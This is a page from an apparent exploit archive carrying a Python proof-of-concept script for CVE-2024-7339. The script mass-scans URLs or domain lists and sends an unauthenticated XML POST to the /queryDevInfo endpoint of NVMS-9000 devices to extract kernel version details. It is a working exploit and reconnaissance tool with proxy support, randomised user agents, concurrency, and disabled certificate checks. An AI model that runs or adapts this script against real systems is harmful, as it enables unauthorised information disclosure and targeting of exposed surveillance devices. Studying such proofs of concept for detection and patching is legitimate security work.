4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import asyncio
import argparse
import aiofiles
from alive_progress import alive_bar
from fake_useragent import UserAgent
from colorama import Fore, Style
import ssl
import httpx
import random
import os
import re
import json
import xml.etree.ElementTree as ET
import anyio

# ANSI foreground colours (from colorama) used throughout the console output.
red, green, blue = Fore.RED, Fore.GREEN, Fore.BLUE
cyan, magenta, yellow, white = Fore.CYAN, Fore.MAGENTA, Fore.YELLOW, Fore.WHITE
mixed = red + blue

# Text attributes: bright/bold on, and "reset everything".
bold = Style.BRIGHT
reset = Style.RESET_ALL

# The banner colour is drawn once, at import time, from this palette.
colors = [green, cyan, blue]
random_color = random.choice(colors)

def banner():
    """Return the coloured ASCII-art banner shown at start-up.

    The art is prefixed with the module-level ``bold`` and ``random_color``
    escape codes and ends with the ``@RevoltSecurities`` tag, ``reset`` and a
    trailing newline.

    Returns:
        str: The banner text, ready to be passed to ``print``.
    """
    # Backslashes in the art are doubled on purpose: "\/" and "\_" are not
    # valid escape sequences, and newer Python versions warn about them.
    # The rendered text is exactly the same as before.
    art = f"""{bold}{random_color}
    ______     ____  __         _ ______
   / ____/  __/ __ \\/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \\/ / / / / _ \\/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /
/_____/_/|_/_/   /_____|____/_/ /_/  \\___/_/

                    {bold}{white}@RevoltSecurities{reset}\n"""

    return art

# Show the banner as soon as the script starts.
print(banner())

# Command-line interface. The auto-generated usage line is suppressed
# (usage=argparse.SUPPRESS); only the coloured description/help text is shown.
parser = argparse.ArgumentParser(description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation  tool for  CVE-2024-7339" , usage=argparse.SUPPRESS)
parser.add_argument("-u", "--url", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or domain for vulnerability detection")
parser.add_argument("-l", "--list", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs for vulnerability detection")
parser.add_argument("-t", "--threads", type=int, default=1, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Number of threads for list of URLs")
parser.add_argument("-proxy", "--proxy", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Proxy URL to send request via your proxy")
parser.add_argument("-v", "--verbose", action="store_true", help=f"[{bold}{blue}INF{reset}]: {bold}{white}Increases verbosity of output in console")
# The help text used to end in "{reset}]", which printed a stray "]".
parser.add_argument("-o", "--output", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Filename to save output of vulnerable target{reset}")

# Parsed once at import time; the coroutines below read this module-level object.
args = parser.parse_args()

async def save(result):
    """Append one result line to the output file.

    The destination comes from ``args.output``:

    * unset/empty  -> ``results.txt`` in the current directory,
    * a directory  -> ``results.txt`` inside that directory,
    * anything else -> used as the file path as given.

    Args:
        result: Text to append; a newline is written after it.

    A failed write is reported on the console instead of being raised, so one
    failing write does not abort the scan. Task cancellation is propagated
    to the caller, and a KeyboardInterrupt ends the program.
    """
    if not args.output:
        target = "results.txt"
    elif os.path.isdir(args.output):
        target = os.path.join(args.output, "results.txt")
    else:
        target = args.output

    try:
        async with aiofiles.open(target, "a") as handle:
            await handle.write(result + '\n')
    except asyncio.CancelledError:
        # Swallowing cancellation would keep a cancelled task running.
        raise
    except KeyboardInterrupt:
        # Same effect as the former quit(), without relying on the site module.
        raise SystemExit from None
    except OSError as e:
        # A lost result is worth telling the user about even without --verbose.
        print(f"[{bold}{red}WRN{reset}]: {bold}{white}could not write to {target}: {e}{reset}")
    except Exception as e:
        if args.verbose:
            print(f"Exception in save: {e}, {type(e)}")


async def exploit(session, url, sem, bar):
    """Check one target's ``/queryDevInfo`` endpoint and record a positive hit.

    Sends a POST request with a fixed XML body to ``{url}/queryDevInfo``. If
    the answer is HTTP 200 and its body contains a ``kenerlVersion`` element,
    the target and the reported version are printed and passed to ``save``.

    Args:
        session: The shared ``httpx.AsyncClient`` used to send the request.
        url: Target base URL; trailing slashes are stripped.
        sem: Semaphore permit holder; the permit acquired by the caller is
            released here when the check finishes.
        bar: Progress-bar callable, invoked once when the check finishes.

    Connection, TLS, URL and stream errors are treated as "not vulnerable" and
    ignored; other errors are printed only with ``--verbose``. Cancellation is
    re-raised so a cancelled task really stops.
    """
    try:
        url = url.rstrip("/")
        base_url = f"{url}/queryDevInfo"
        # No explicit Content-Length: httpx derives it from the body, so the
        # header cannot go stale if the payload is ever edited.
        headers = {
            "Accept-Language": "en-US,en;q=0.9",
            "Accept-Encoding": "gzip, deflate",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Upgrade-Insecure-Requests": "1",
            "Connection": "keep-alive",
            "User-Agent": UserAgent().random,
        }
        payload = '<?xml version="1.0" encoding="utf-8" ?><request version="1.0" systemType="NVMS-9000" clientType="WEB"/>'
        # ``content=`` is httpx's parameter for a raw text/bytes body; passing a
        # string through ``data=`` is deprecated.
        response = await session.request("POST", base_url, content=payload, headers=headers, timeout=30, follow_redirects=True)

        if response.status_code != 200:
            return

        # errors="replace": a body that is not valid UTF-8 should simply fail
        # the marker check below rather than raise.
        body = (await response.aread()).decode('utf-8', errors='replace')
        if "</kenerlVersion>" not in body:
            return

        # NOTE(review): the body comes from an untrusted remote host and
        # xml.etree is not hardened against maliciously constructed XML;
        # consider a hardened parser if that matters for your environment.
        root = ET.fromstring(body)
        node = root.find("kenerlVersion")
        if node is None:
            # The marker was present but not as a direct child of the root.
            if args.verbose:
                print(f"Exception in request: kenerlVersion element not found in response from {url}")
            return

        kernal = node.text
        print(f"[{bold}{green}Vuln{reset}]: {bold}{white}{url} - Kernal Version: {kernal}{reset}")
        await save(f"{url} - Kernal Version: {kernal}")

    except asyncio.CancelledError:
        # Must propagate, otherwise a cancelled task would finish "normally".
        raise
    except KeyboardInterrupt:
        # The original bare ``SystemExit`` expression did nothing; exit for real.
        raise SystemExit from None
    except (httpx.RequestError, httpx.InvalidURL, ssl.SSLError, anyio.EndOfStream):
        # httpx.RequestError already covers connect and timeout errors.
        return
    except Exception as e:
        if args.verbose:
            print(f"Exception in request: {e}, {type(e)}")
    finally:
        # Always hand the permit back and advance the progress bar.
        sem.release()
        bar()


async def loader(urls, session, sem, bar):
    """Start one ``exploit`` task per URL and wait for all of them.

    A semaphore permit is acquired before each task is created, so the number
    of tasks in flight is bounded by the semaphore; each ``exploit`` call
    releases its permit when it finishes.

    Args:
        urls: Iterable of target URLs.
        session: Shared HTTP client passed through to ``exploit``.
        sem: Semaphore limiting concurrency.
        bar: Progress-bar callable passed through to ``exploit``.

    Raises:
        asyncio.CancelledError: Re-raised after outstanding tasks have been
            cancelled, so the caller stops as well.
    """
    tasks = []
    try:
        for url in urls:
            await sem.acquire()
            tasks.append(asyncio.ensure_future(exploit(session, url, sem, bar)))

        # return_exceptions=True: one failing task must not abort the others.
        await asyncio.gather(*tasks, return_exceptions=True)
    except asyncio.CancelledError:
        # Cancellation may arrive while waiting for a permit, when the tasks
        # started so far are not yet being awaited. Cancel and drain them so
        # they finish before the caller tears down the client and the bar.
        for task in tasks:
            task.cancel()
        await asyncio.gather(*tasks, return_exceptions=True)
        raise
    except KeyboardInterrupt:
        # The original bare ``SystemExit`` expression did nothing; exit for real.
        raise SystemExit from None
    except Exception as e:
        print(f"Exception in loader: {e}, {type(e)}")


async def threads(urls):
    """Run the check over ``urls`` with bounded concurrency and a progress bar.

    Duplicates are removed (input order is kept), an HTTP client is opened
    with the optional ``args.proxy``, and the work is handed to ``loader``.

    Args:
        urls: Iterable of target URLs; may contain duplicates.

    Errors are printed only with ``--verbose``.
    """
    try:
        # dict.fromkeys de-duplicates like set() but keeps a stable order.
        urls = list(dict.fromkeys(urls))

        # A semaphore with 0 permits would block the first acquire forever and
        # a negative value raises ValueError, so fall back to one worker.
        sem = asyncio.BoundedSemaphore(max(1, args.threads))
        proxy = args.proxy or None

        # verify=False: TLS certificate verification is disabled for targets.
        async with httpx.AsyncClient(verify=False, proxy=proxy) as session:
            with alive_bar(title=f"{bold}{white}Exploiter{reset}", total=len(urls), enrich_print=False) as bar:
                await loader(urls, session, sem, bar)
    except KeyboardInterrupt:
        # The original bare ``SystemExit`` expression did nothing; exit for real.
        raise SystemExit from None
    except Exception as e:
        # RuntimeError used to be dropped silently; it is now reported here
        # like any other error when --verbose is set.
        if args.verbose:
            print(f"Exception in threads: {e}, {type(e)}")

def _candidate_urls(target):
    """Return the URL(s) to check for one user-supplied target string."""
    if target.startswith(("https://", "http://")):
        return [target]
    # No scheme given: try both.
    return [f"https://{target}", f"http://{target}"]


async def main():
    """Collect targets from ``--url`` and/or ``--list`` and run the check once.

    Targets without an ``http://`` or ``https://`` prefix are expanded to both
    schemes. Blank lines in the list file are skipped. A missing list file is
    reported and any ``--url`` target is still processed.
    """
    try:
        if not (args.url or args.list):
            # Previously the script printed the banner and exited silently.
            print(f"[{bold}{red}WRN{reset}]: {bold}{white}no target given, use -u/--url or -l/--list{reset}")
            return

        urls = []
        if args.url:
            urls.extend(_candidate_urls(args.url))

        if args.list:
            try:
                async with aiofiles.open(args.list, "r") as streamr:
                    async for line in streamr:
                        target = line.strip()
                        if target:  # a blank line would otherwise become "https://"
                            urls.extend(_candidate_urls(target))
            except FileNotFoundError:
                print(f"[{bold}{red}WRN{reset}]: {bold}{white}{args.list} no such file or directory{reset}")

        # One run over everything: calling threads() once per option used to
        # process the --url targets twice when both options were given.
        if urls:
            await threads(urls)

    except Exception as e:
        print(f"Exception in main: {e}, {type(e)}")

if __name__ == "__main__":
    # Ctrl-C surfaces from asyncio.run() as KeyboardInterrupt; exit quietly
    # with the conventional "interrupted" status instead of a traceback.
    try:
        asyncio.run(main())
    except KeyboardInterrupt:
        raise SystemExit(130) from None